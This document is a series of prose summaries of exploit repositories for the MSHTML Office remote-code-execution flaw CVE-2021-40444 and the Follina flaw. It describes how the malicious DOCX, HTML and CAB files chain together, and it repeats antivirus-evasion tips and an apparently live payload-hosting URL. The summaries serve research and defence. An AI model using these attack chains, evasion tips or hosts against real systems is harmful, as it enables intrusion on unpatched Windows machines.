Microsoft MSHTML Remote Code Execution Vulnerability

This repository provides a full builder toolkit for constructing exploits targeting CVE-2021-40444, a critical Microsoft Office Word remote code execution vulnerability. The structure includes a set of Python scripts: 'generate_cab.py' creates a malicious CAB archive containing an attacker-supplied DLL; 'generate_html.py' produces an HTML file referencing the CAB file; and 'generate_doc.py' crafts a Word document (.docx) that embeds an external OLE object reference to the attacker's HTML or CAB file. The 'doc' directory contains template Office XML files that are modified by the scripts to include the malicious references. The README provides detailed instructions for using the toolkit, including AV evasion tips (such as using uppercase 'HTTP' and backslashes in URLs). The exploit chain is: (1) attacker prepares a DLL payload, (2) builds a CAB file, (3) hosts the CAB and HTML files, (4) generates a malicious .docx that references the attacker's content, and (5) delivers the document to a victim. When opened, the document causes Office to fetch and execute the attacker's DLL, resulting in arbitrary code execution. The repository is operational and can be used to generate working exploits for CVE-2021-40444, with customizable payloads and network endpoints.

This repository is a fully weaponized exploit generator for CVE-2021-40444 (Microsoft Office Word Remote Code Execution) and CVE-2022-30190 (Follina, ms-msdt). It contains Python scripts (generator.py, cab_parser.py) to automate the creation of malicious DOCX/RTF files that exploit these vulnerabilities. The generator can embed arbitrary attacker-supplied payloads (DLLs, scripts) and supports multiple exploit chains, including CAB-based, CAB-less (RAR, HTML smuggling), and Follina (ms-msdt) variants. The exploit works by crafting a DOCX/RTF file that references a malicious HTML file, which in turn triggers the download and execution of a payload via ActiveX, CAB path traversal, or the ms-msdt protocol. The repository includes templates for the malicious HTML, test payloads (calc.exe launchers in various scripting languages), and a simple Python web server for hosting the payloads. The exploit is highly customizable and operational, supporting arbitrary code execution on vulnerable Windows systems with Microsoft Office. Notable endpoints include the use of HTTP(S) servers for payload delivery and various file paths in the Windows temp directories for payload drop and execution. The structure is modular, with clear separation between payload generation, file templates, and server hosting.

This repository provides a full proof-of-concept exploit for CVE-2021-40444, a critical remote code execution vulnerability in Microsoft Windows MSHTML (Trident) engine, exploited via malicious Office documents. The structure includes: - A 'maldoc' directory containing the components of a malicious DOCX file, with instructions to modify 'document.xml.rels' to point to a hosted HTML exploit. - 'www/exploit.html' and 'www/deob.html' are the obfuscated and deobfuscated HTML exploit files, respectively. These files use JavaScript and ActiveX to trigger the vulnerability and fetch a malicious CAB file containing a DLL payload. - 'patch_cab.py' and 'deobfuscate.py' are helper scripts for preparing the CAB file and deobfuscating the HTML exploit. - The payload is a DLL (calc.dll) that, when executed, launches calc.exe as a demonstration of code execution. - The README.md provides detailed step-by-step instructions for generating the malicious DOCX, CAB, and setting up the HTTP server to deliver the exploit chain. The exploit chain is as follows: a user opens the crafted DOCX, which loads a remote HTML file (exploit.html) via MSHTML. The HTML triggers the vulnerability, causing the system to fetch and execute a DLL from a CAB file, resulting in arbitrary code execution. The exploit is operational and demonstrates real code execution, but the payload is a simple demonstration (calc.exe).

This repository is a proof-of-concept (POC) exploit for CVE-2021-40444, a remote code execution vulnerability in Microsoft Internet Explorer (and related Windows components) via malicious ActiveX controls. The repository contains two files: a brief README and a 'poc.html' file. The HTML file contains obfuscated JavaScript that creates multiple iframes and ActiveX objects, then attempts to download a malicious CAB file from 'http://localhost/trojan.cab' and load it using a specific ActiveX class ID. The script also manipulates file paths such as 'AppData/Local/Temp/Low/whoiam.inf' to potentially drop or interact with files on the target system. The exploit is designed to be opened in Internet Explorer 11 on Windows, with ActiveX enabled, and demonstrates the attack vector but does not include a real payload (the CAB file is referenced as 'localhost'). This POC is intended for research and demonstration purposes.

This repository is a fully weaponized exploit generator for CVE-2021-40444, a critical Microsoft Office Word Remote Code Execution vulnerability. The exploit leverages a crafted .docx file that references a malicious HTML file, which in turn uses ActiveX and path traversal in a CAB file to drop and execute an attacker-controlled DLL or script via the .cpl URI handler. The repository includes Python scripts (generator.py, cab_parser.py) to automate the creation and patching of malicious CAB files, generate the required DDF files, and serve the payloads via a simple web server (util/server.py). Multiple HTML templates are provided for different obfuscation and delivery strategies, including CAB-less and RAR-based variants. Test payloads (calc.js, calc.vbs, calc.hta, job-jscript.wsf, job-vbs.wsf) demonstrate code execution. The exploit is highly configurable, allowing the attacker to specify the payload, hosting URL, and output format. The structure is modular, with clear separation between payload generation, document crafting, and hosting. This is a mature, weaponized exploit toolkit targeting unpatched Microsoft Office installations on Windows, capable of delivering arbitrary code execution via document-based attack vectors.

This repository contains a single JavaScript file, 'loader.js', which implements a browser-based exploit targeting Internet Explorer on Windows systems. The exploit leverages ActiveX objects and the 'htmlfile' COM object to create a controlled environment, then attempts to download a remote CAB file ('http://hidusi.com/e8c76295a5f9acb7/ministry.cab') and instantiate it via an embedded object element. The script manipulates the DOM and uses various file paths (e.g., 'AppData/Local/Temp/Low/championship.inf') that suggest attempts to drop or interact with files on the victim's system. The exploit is operational and could lead to remote code execution if run in a vulnerable environment. The code is not part of a known exploit framework and is written in JavaScript, designed to be executed in a browser context with ActiveX enabled.

This repository contains a Metasploit module (Microsoft-Office-Word-MSHTML_Exploit.rb) that exploits CVE-2021-40444, a remote code execution vulnerability in Microsoft Office Word's handling of MSHTML (browser rendering engine) via malicious ActiveX controls. The module generates a malicious DOCX file ('msf.docx') that, when opened on a vulnerable Windows system, triggers code execution by loading further payloads from an attacker-controlled HTTP(S) server. The exploit leverages both file format and network attack vectors: the initial infection vector is the crafted DOCX file, and subsequent payloads (HTML, CAB, DLL) are served over HTTP/HTTPS. The module allows for payload customization using Metasploit's payload system, making it weaponized and suitable for red teaming or penetration testing. The repository structure is simple, with the main exploit logic in the Ruby file and a brief README describing its purpose.

The repository 'Caboom' is a C# project designed to generate malicious .cab files for exploiting CVE-2021-40444, a Microsoft MSHTML remote code execution vulnerability. The main logic resides in 'Program.cs', which takes a user-supplied .dll or .inf file, uses CABARC.EXE to package it into a .cab archive, and then modifies specific bytes in the resulting file to create a final payload ('finalPayload.cab'). This crafted .cab file can be used in further exploitation scenarios, such as embedding in Office documents to trigger the vulnerability. The repository includes Visual Studio project files, configuration files, and build artifacts, but the core exploit logic is in 'Program.cs'. The tool is intended for penetration testers and red teamers, as stated in the README, and is not a detection script. No network endpoints are present; the attack vector is local file manipulation for subsequent use in remote attacks.